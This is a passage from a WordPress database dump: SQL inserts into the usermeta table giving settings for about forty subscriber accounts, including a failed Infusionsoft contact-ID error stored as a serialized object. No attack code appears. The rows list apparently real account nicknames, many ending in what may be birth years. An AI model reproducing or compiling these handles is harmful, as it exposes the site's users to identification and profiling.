(10854, 826, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10855, 826, 'cyb_user_level', '0'),
(10856, 826, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10857, 826, 'default_password_nag', '1'),
(10858, 827, 'nickname', 'april4384r1980'),
(10859, 827, 'first_name', ''),
(10860, 827, 'last_name', ''),
(10861, 827, 'description', ''),
(10862, 827, 'rich_editing', 'true'),
(10863, 827, 'comment_shortcuts', 'false'),
(10864, 827, 'admin_color', 'fresh'),
(10865, 827, 'use_ssl', '0'),
(10866, 827, 'show_admin_bar_front', 'true'),
(10867, 827, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10868, 827, 'cyb_user_level', '0'),
(10869, 827, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10870, 827, 'default_password_nag', '1'),
(10871, 828, 'nickname', 'adobodude14121961'),
(10872, 828, 'first_name', ''),
(10873, 828, 'last_name', ''),
(10874, 828, 'description', '');
INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(10875, 828, 'rich_editing', 'true'),
(10876, 828, 'comment_shortcuts', 'false'),
(10877, 828, 'admin_color', 'fresh'),
(10878, 828, 'use_ssl', '0'),
(10879, 828, 'show_admin_bar_front', 'true'),
(10880, 828, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10881, 828, 'cyb_user_level', '0'),
(10882, 828, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10883, 828, 'default_password_nag', '1'),
(10884, 829, 'nickname', 'sefal751972'),
(10885, 829, 'first_name', ''),
(10886, 829, 'last_name', ''),
(10887, 829, 'description', ''),
(10888, 829, 'rich_editing', 'true'),
(10889, 829, 'comment_shortcuts', 'false'),
(10890, 829, 'admin_color', 'fresh'),
(10891, 829, 'use_ssl', '0'),
(10892, 829, 'show_admin_bar_front', 'true'),
(10893, 829, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10894, 829, 'cyb_user_level', '0'),
(10895, 829, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10896, 829, 'default_password_nag', '1'),
(10897, 830, 'nickname', 'omarifran1967'),
(10898, 830, 'first_name', ''),
(10899, 830, 'last_name', ''),
(10900, 830, 'description', ''),
(10901, 830, 'rich_editing', 'true'),
(10902, 830, 'comment_shortcuts', 'false'),
(10903, 830, 'admin_color', 'fresh'),
(10904, 830, 'use_ssl', '0'),
(10905, 830, 'show_admin_bar_front', 'true'),
(10906, 830, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10907, 830, 'cyb_user_level', '0'),
(10908, 830, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10909, 830, 'default_password_nag', '1'),
(10910, 831, 'nickname', 'kika_osunde1950'),
(10911, 831, 'first_name', ''),
(10912, 831, 'last_name', ''),
(10913, 831, 'description', ''),
(10914, 831, 'rich_editing', 'true'),
(10915, 831, 'comment_shortcuts', 'false'),
(10916, 831, 'admin_color', 'fresh'),
(10917, 831, 'use_ssl', '0'),
(10918, 831, 'show_admin_bar_front', 'true'),
(10919, 831, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10920, 831, 'cyb_user_level', '0'),
(10921, 831, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10922, 831, 'default_password_nag', '1'),
(10923, 832, 'nickname', 'dscalesdesanjuan1977'),
(10924, 832, 'first_name', ''),
(10925, 832, 'last_name', ''),
(10926, 832, 'description', ''),
(10927, 832, 'rich_editing', 'true'),
(10928, 832, 'comment_shortcuts', 'false'),
(10929, 832, 'admin_color', 'fresh'),
(10930, 832, 'use_ssl', '0'),
(10931, 832, 'show_admin_bar_front', 'true'),
(10932, 832, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10933, 832, 'cyb_user_level', '0'),
(10934, 832, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10935, 832, 'default_password_nag', '1'),
(10936, 833, 'nickname', 'davegill12006'),
(10937, 833, 'first_name', ''),
(10938, 833, 'last_name', ''),
(10939, 833, 'description', ''),
(10940, 833, 'rich_editing', 'true'),
(10941, 833, 'comment_shortcuts', 'false'),
(10942, 833, 'admin_color', 'fresh'),
(10943, 833, 'use_ssl', '0'),
(10944, 833, 'show_admin_bar_front', 'true'),
(10945, 833, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10946, 833, 'cyb_user_level', '0'),
(10947, 833, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10948, 833, 'default_password_nag', '1'),
(10949, 834, 'nickname', 'bigcloseouts2005'),
(10950, 834, 'first_name', ''),
(10951, 834, 'last_name', ''),
(10952, 834, 'description', ''),
(10953, 834, 'rich_editing', 'true'),
(10954, 834, 'comment_shortcuts', 'false'),
(10955, 834, 'admin_color', 'fresh'),
(10956, 834, 'use_ssl', '0'),
(10957, 834, 'show_admin_bar_front', 'true'),
(10958, 834, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10959, 834, 'cyb_user_level', '0'),
(10960, 834, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10961, 834, 'default_password_nag', '1'),
(10962, 835, 'nickname', 'danbone1112009'),
(10963, 835, 'first_name', ''),
(10964, 835, 'last_name', ''),
(10965, 835, 'description', ''),
(10966, 835, 'rich_editing', 'true'),
(10967, 835, 'comment_shortcuts', 'false'),
(10968, 835, 'admin_color', 'fresh'),
(10969, 835, 'use_ssl', '0'),
(10970, 835, 'show_admin_bar_front', 'true'),
(10971, 835, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10972, 835, 'cyb_user_level', '0'),
(10973, 835, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10974, 835, 'default_password_nag', '1'),
(10975, 836, 'nickname', 'lesleyjohnston18291990'),
(10976, 836, 'first_name', ''),
(10977, 836, 'last_name', ''),
(10978, 836, 'description', ''),
(10979, 836, 'rich_editing', 'true'),
(10980, 836, 'comment_shortcuts', 'false'),
(10981, 836, 'admin_color', 'fresh'),
(10982, 836, 'use_ssl', '0'),
(10983, 836, 'show_admin_bar_front', 'true'),
(10984, 836, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10985, 836, 'cyb_user_level', '0'),
(10986, 836, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(10987, 836, 'default_password_nag', '1'),
(10988, 837, 'nickname', 'corpy871954'),
(10989, 837, 'first_name', ''),
(10990, 837, 'last_name', ''),
(10991, 837, 'description', ''),
(10992, 837, 'rich_editing', 'true'),
(10993, 837, 'comment_shortcuts', 'false'),
(10994, 837, 'admin_color', 'fresh'),
(10995, 837, 'use_ssl', '0'),
(10996, 837, 'show_admin_bar_front', 'true'),
(10997, 837, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(10998, 837, 'cyb_user_level', '0'),
(10999, 837, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11000, 837, 'default_password_nag', '1'),
(11001, 838, 'nickname', 'abarton421983'),
(11002, 838, 'first_name', ''),
(11003, 838, 'last_name', ''),
(11004, 838, 'description', ''),
(11005, 838, 'rich_editing', 'true'),
(11006, 838, 'comment_shortcuts', 'false'),
(11007, 838, 'admin_color', 'fresh'),
(11008, 838, 'use_ssl', '0'),
(11009, 838, 'show_admin_bar_front', 'true'),
(11010, 838, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11011, 838, 'cyb_user_level', '0'),
(11012, 838, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11013, 838, 'default_password_nag', '1'),
(11014, 839, 'nickname', 'karlinemurphy1955'),
(11015, 839, 'first_name', ''),
(11016, 839, 'last_name', ''),
(11017, 839, 'description', ''),
(11018, 839, 'rich_editing', 'true'),
(11019, 839, 'comment_shortcuts', 'false'),
(11020, 839, 'admin_color', 'fresh'),
(11021, 839, 'use_ssl', '0'),
(11022, 839, 'show_admin_bar_front', 'true'),
(11023, 839, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11024, 839, 'cyb_user_level', '0'),
(11025, 839, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11026, 839, 'default_password_nag', '1'),
(11027, 840, 'nickname', 'sanchezgp20011966'),
(11028, 840, 'first_name', ''),
(11029, 840, 'last_name', ''),
(11030, 840, 'description', ''),
(11031, 840, 'rich_editing', 'true'),
(11032, 840, 'comment_shortcuts', 'false'),
(11033, 840, 'admin_color', 'fresh'),
(11034, 840, 'use_ssl', '0'),
(11035, 840, 'show_admin_bar_front', 'true'),
(11036, 840, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11037, 840, 'cyb_user_level', '0'),
(11038, 840, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11039, 840, 'default_password_nag', '1'),
(11040, 841, 'nickname', 'jose.freille1980'),
(11041, 841, 'first_name', ''),
(11042, 841, 'last_name', ''),
(11043, 841, 'description', ''),
(11044, 841, 'rich_editing', 'true'),
(11045, 841, 'comment_shortcuts', 'false'),
(11046, 841, 'admin_color', 'fresh'),
(11047, 841, 'use_ssl', '0'),
(11048, 841, 'show_admin_bar_front', 'true'),
(11049, 841, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11050, 841, 'cyb_user_level', '0'),
(11051, 841, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11052, 841, 'default_password_nag', '1'),
(11053, 842, 'nickname', 'trombley221971'),
(11054, 842, 'first_name', ''),
(11055, 842, 'last_name', ''),
(11056, 842, 'description', ''),
(11057, 842, 'rich_editing', 'true'),
(11058, 842, 'comment_shortcuts', 'false'),
(11059, 842, 'admin_color', 'fresh'),
(11060, 842, 'use_ssl', '0'),
(11061, 842, 'show_admin_bar_front', 'true'),
(11062, 842, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11063, 842, 'cyb_user_level', '0'),
(11064, 842, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11065, 842, 'default_password_nag', '1'),
(11066, 843, 'nickname', 'oscarivanhincapie2005'),
(11067, 843, 'first_name', ''),
(11068, 843, 'last_name', ''),
(11069, 843, 'description', ''),
(11070, 843, 'rich_editing', 'true'),
(11071, 843, 'comment_shortcuts', 'false'),
(11072, 843, 'admin_color', 'fresh'),
(11073, 843, 'use_ssl', '0'),
(11074, 843, 'show_admin_bar_front', 'true'),
(11075, 843, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11076, 843, 'cyb_user_level', '0'),
(11077, 843, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11078, 843, 'default_password_nag', '1'),
(11079, 844, 'nickname', 'uclastarr1970'),
(11080, 844, 'first_name', ''),
(11081, 844, 'last_name', ''),
(11082, 844, 'description', ''),
(11083, 844, 'rich_editing', 'true'),
(11084, 844, 'comment_shortcuts', 'false'),
(11085, 844, 'admin_color', 'fresh'),
(11086, 844, 'use_ssl', '0'),
(11087, 844, 'show_admin_bar_front', 'true'),
(11088, 844, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11089, 844, 'cyb_user_level', '0'),
(11090, 844, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11091, 844, 'default_password_nag', '1'),
(11092, 845, 'nickname', 'amanovatti1977'),
(11093, 845, 'first_name', ''),
(11094, 845, 'last_name', ''),
(11095, 845, 'description', ''),
(11096, 845, 'rich_editing', 'true'),
(11097, 845, 'comment_shortcuts', 'false'),
(11098, 845, 'admin_color', 'fresh'),
(11099, 845, 'use_ssl', '0'),
(11100, 845, 'show_admin_bar_front', 'true'),
(11101, 845, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11102, 845, 'cyb_user_level', '0'),
(11103, 845, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11104, 845, 'default_password_nag', '1'),
(11105, 846, 'nickname', 'latoya.ellis11994'),
(11106, 846, 'first_name', ''),
(11107, 846, 'last_name', ''),
(11108, 846, 'description', ''),
(11109, 846, 'rich_editing', 'true'),
(11110, 846, 'comment_shortcuts', 'false'),
(11111, 846, 'admin_color', 'fresh'),
(11112, 846, 'use_ssl', '0'),
(11113, 846, 'show_admin_bar_front', 'true'),
(11114, 846, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11115, 846, 'cyb_user_level', '0'),
(11116, 846, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11117, 846, 'default_password_nag', '1'),
(11118, 847, 'nickname', 'vanattacrew21964'),
(11119, 847, 'first_name', ''),
(11120, 847, 'last_name', ''),
(11121, 847, 'description', ''),
(11122, 847, 'rich_editing', 'true'),
(11123, 847, 'comment_shortcuts', 'false'),
(11124, 847, 'admin_color', 'fresh'),
(11125, 847, 'use_ssl', '0'),
(11126, 847, 'show_admin_bar_front', 'true'),
(11127, 847, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11128, 847, 'cyb_user_level', '0'),
(11129, 847, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11130, 847, 'default_password_nag', '1'),
(11131, 848, 'nickname', 'curnoe1958'),
(11132, 848, 'first_name', ''),
(11133, 848, 'last_name', ''),
(11134, 848, 'description', ''),
(11135, 848, 'rich_editing', 'true'),
(11136, 848, 'comment_shortcuts', 'false'),
(11137, 848, 'admin_color', 'fresh'),
(11138, 848, 'use_ssl', '0'),
(11139, 848, 'show_admin_bar_front', 'true'),
(11140, 848, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11141, 848, 'cyb_user_level', '0'),
(11142, 848, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11143, 848, 'default_password_nag', '1'),
(11144, 849, 'nickname', 'lespesjulien332005'),
(11145, 849, 'first_name', ''),
(11146, 849, 'last_name', ''),
(11147, 849, 'description', ''),
(11148, 849, 'rich_editing', 'true'),
(11149, 849, 'comment_shortcuts', 'false'),
(11150, 849, 'admin_color', 'fresh'),
(11151, 849, 'use_ssl', '0'),
(11152, 849, 'show_admin_bar_front', 'true'),
(11153, 849, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11154, 849, 'cyb_user_level', '0'),
(11155, 849, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11156, 849, 'default_password_nag', '1'),
(11157, 850, 'nickname', 'rcollins1957'),
(11158, 850, 'first_name', ''),
(11159, 850, 'last_name', ''),
(11160, 850, 'description', ''),
(11161, 850, 'rich_editing', 'true'),
(11162, 850, 'comment_shortcuts', 'false'),
(11163, 850, 'admin_color', 'fresh'),
(11164, 850, 'use_ssl', '0'),
(11165, 850, 'show_admin_bar_front', 'true'),
(11166, 850, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11167, 850, 'cyb_user_level', '0'),
(11168, 850, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11169, 850, 'default_password_nag', '1'),
(11170, 851, 'nickname', 'southpaw27221977'),
(11171, 851, 'first_name', ''),
(11172, 851, 'last_name', ''),
(11173, 851, 'description', ''),
(11174, 851, 'rich_editing', 'true'),
(11175, 851, 'comment_shortcuts', 'false'),
(11176, 851, 'admin_color', 'fresh'),
(11177, 851, 'use_ssl', '0'),
(11178, 851, 'show_admin_bar_front', 'true'),
(11179, 851, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11180, 851, 'cyb_user_level', '0'),
(11181, 851, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11182, 851, 'default_password_nag', '1'),
(11183, 852, 'nickname', 'cobourn1988'),
(11184, 852, 'first_name', ''),
(11185, 852, 'last_name', ''),
(11186, 852, 'description', ''),
(11187, 852, 'rich_editing', 'true'),
(11188, 852, 'comment_shortcuts', 'false'),
(11189, 852, 'admin_color', 'fresh'),
(11190, 852, 'use_ssl', '0'),
(11191, 852, 'show_admin_bar_front', 'true'),
(11192, 852, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11193, 852, 'cyb_user_level', '0'),
(11194, 852, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11195, 852, 'default_password_nag', '1'),
(11196, 853, 'nickname', 'justorafael.jj1985'),
(11197, 853, 'first_name', ''),
(11198, 853, 'last_name', ''),
(11199, 853, 'description', ''),
(11200, 853, 'rich_editing', 'true'),
(11201, 853, 'comment_shortcuts', 'false'),
(11202, 853, 'admin_color', 'fresh'),
(11203, 853, 'use_ssl', '0'),
(11204, 853, 'show_admin_bar_front', 'true'),
(11205, 853, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11206, 853, 'cyb_user_level', '0'),
(11207, 853, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11208, 853, 'default_password_nag', '1'),
(11209, 854, 'nickname', 'danielborba881993'),
(11210, 854, 'first_name', ''),
(11211, 854, 'last_name', ''),
(11212, 854, 'description', ''),
(11213, 854, 'rich_editing', 'true'),
(11214, 854, 'comment_shortcuts', 'false'),
(11215, 854, 'admin_color', 'fresh'),
(11216, 854, 'use_ssl', '0'),
(11217, 854, 'show_admin_bar_front', 'true'),
(11218, 854, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11219, 854, 'cyb_user_level', '0'),
(11220, 854, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11221, 854, 'default_password_nag', '1'),
(11222, 855, 'nickname', 'canes11020181261954'),
(11223, 855, 'first_name', ''),
(11224, 855, 'last_name', ''),
(11225, 855, 'description', ''),
(11226, 855, 'rich_editing', 'true'),
(11227, 855, 'comment_shortcuts', 'false'),
(11228, 855, 'admin_color', 'fresh'),
(11229, 855, 'use_ssl', '0'),
(11230, 855, 'show_admin_bar_front', 'true'),
(11231, 855, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11232, 855, 'cyb_user_level', '0'),
(11233, 855, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11234, 855, 'default_password_nag', '1'),
(11235, 856, 'nickname', 'mikidabrock1975'),
(11236, 856, 'first_name', ''),
(11237, 856, 'last_name', ''),
(11238, 856, 'description', ''),
(11239, 856, 'rich_editing', 'true'),
(11240, 856, 'comment_shortcuts', 'false'),
(11241, 856, 'admin_color', 'fresh'),
(11242, 856, 'use_ssl', '0'),
(11243, 856, 'show_admin_bar_front', 'true'),
(11244, 856, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11245, 856, 'cyb_user_level', '0'),
(11246, 856, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11247, 856, 'default_password_nag', '1'),
(11248, 857, 'nickname', 'scott.holbert2003'),
(11249, 857, 'first_name', ''),
(11250, 857, 'last_name', ''),
(11251, 857, 'description', ''),
(11252, 857, 'rich_editing', 'true'),
(11253, 857, 'comment_shortcuts', 'false'),
(11254, 857, 'admin_color', 'fresh'),
(11255, 857, 'use_ssl', '0'),
(11256, 857, 'show_admin_bar_front', 'true'),
(11257, 857, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11258, 857, 'cyb_user_level', '0'),
(11259, 857, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11260, 857, 'default_password_nag', '1'),
(11261, 858, 'nickname', 'jaywalcott1989'),
(11262, 858, 'first_name', ''),
(11263, 858, 'last_name', ''),
(11264, 858, 'description', ''),
(11265, 858, 'rich_editing', 'true'),
(11266, 858, 'comment_shortcuts', 'false'),
(11267, 858, 'admin_color', 'fresh'),
(11268, 858, 'use_ssl', '0'),
(11269, 858, 'show_admin_bar_front', 'true'),
(11270, 858, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11271, 858, 'cyb_user_level', '0'),
(11272, 858, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11273, 858, 'default_password_nag', '1'),
(11274, 859, 'nickname', 'danay1968'),
(11275, 859, 'first_name', ''),
(11276, 859, 'last_name', ''),
(11277, 859, 'description', ''),
(11278, 859, 'rich_editing', 'true'),
(11279, 859, 'comment_shortcuts', 'false'),
(11280, 859, 'admin_color', 'fresh'),
(11281, 859, 'use_ssl', '0'),
(11282, 859, 'show_admin_bar_front', 'true'),
(11283, 859, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11284, 859, 'cyb_user_level', '0'),
(11285, 859, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11286, 859, 'default_password_nag', '1'),
(11287, 860, 'nickname', 'sarahfatmata1984'),
(11288, 860, 'first_name', ''),
(11289, 860, 'last_name', ''),
(11290, 860, 'description', ''),
(11291, 860, 'rich_editing', 'true'),
(11292, 860, 'comment_shortcuts', 'false'),
(11293, 860, 'admin_color', 'fresh'),
(11294, 860, 'use_ssl', '0'),
(11295, 860, 'show_admin_bar_front', 'true'),
(11296, 860, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11297, 860, 'cyb_user_level', '0'),
(11298, 860, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11299, 860, 'default_password_nag', '1'),
(11300, 861, 'nickname', 'pascal.labranche1986'),
(11301, 861, 'first_name', ''),
(11302, 861, 'last_name', ''),
(11303, 861, 'description', ''),
(11304, 861, 'rich_editing', 'true'),
(11305, 861, 'comment_shortcuts', 'false'),
(11306, 861, 'admin_color', 'fresh'),
(11307, 861, 'use_ssl', '0'),
(11308, 861, 'show_admin_bar_front', 'true'),
(11309, 861, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11310, 861, 'cyb_user_level', '0'),
(11311, 861, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11312, 861, 'default_password_nag', '1'),
(11313, 862, 'nickname', 'sklyamina1963'),
(11314, 862, 'first_name', ''),
(11315, 862, 'last_name', ''),
(11316, 862, 'description', ''),
(11317, 862, 'rich_editing', 'true'),
(11318, 862, 'comment_shortcuts', 'false'),
(11319, 862, 'admin_color', 'fresh'),
(11320, 862, 'use_ssl', '0'),
(11321, 862, 'show_admin_bar_front', 'true'),
(11322, 862, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11323, 862, 'cyb_user_level', '0'),
(11324, 862, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11325, 862, 'default_password_nag', '1'),
(11326, 863, 'nickname', 'gailrivers1989'),
(11327, 863, 'first_name', ''),
(11328, 863, 'last_name', ''),
(11329, 863, 'description', ''),
(11330, 863, 'rich_editing', 'true'),
(11331, 863, 'comment_shortcuts', 'false'),
(11332, 863, 'admin_color', 'fresh'),
(11333, 863, 'use_ssl', '0'),
(11334, 863, 'show_admin_bar_front', 'true'),
(11335, 863, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11336, 863, 'cyb_user_level', '0'),
(11337, 863, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11338, 863, 'default_password_nag', '1'),
(11339, 864, 'nickname', 'dfidel801966'),
(11340, 864, 'first_name', ''),
(11341, 864, 'last_name', ''),
(11342, 864, 'description', ''),
(11343, 864, 'rich_editing', 'true'),
(11344, 864, 'comment_shortcuts', 'false'),
(11345, 864, 'admin_color', 'fresh'),
(11346, 864, 'use_ssl', '0'),
(11347, 864, 'show_admin_bar_front', 'true'),
(11348, 864, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11349, 864, 'cyb_user_level', '0'),
(11350, 864, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11351, 864, 'default_password_nag', '1'),
(11352, 865, 'nickname', 'ursasarctus1980'),
(11353, 865, 'first_name', ''),
(11354, 865, 'last_name', ''),
(11355, 865, 'description', ''),
(11356, 865, 'rich_editing', 'true'),
(11357, 865, 'comment_shortcuts', 'false'),
(11358, 865, 'admin_color', 'fresh'),
(11359, 865, 'use_ssl', '0'),
(11360, 865, 'show_admin_bar_front', 'true'),
